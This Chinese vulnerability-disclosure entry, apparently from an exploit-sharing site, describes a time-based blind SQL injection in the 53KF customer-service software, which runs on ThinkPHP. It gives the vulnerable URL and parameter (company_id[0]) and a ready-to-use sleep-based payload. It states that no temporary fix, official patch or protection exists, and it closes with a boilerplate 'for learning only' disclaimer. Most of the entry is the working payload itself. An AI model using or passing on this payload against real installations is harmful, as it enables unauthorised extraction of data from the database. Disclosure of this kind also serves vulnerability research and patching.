利用过程: 53KF 采用ThinkPHP框架, 注入地址:http://xxx.com/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]=1,company_id[0]存在时间盲注
payload:
/new/client.php?m=Statistic&a=setLost&field=chat_robot_lost&type=plus&company_id[0]=-1%20or%201!=sleep(5)))limit%201%23between
暂无临时解决方案
暂无官方解决方案
暂无防护方案
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
暂无评论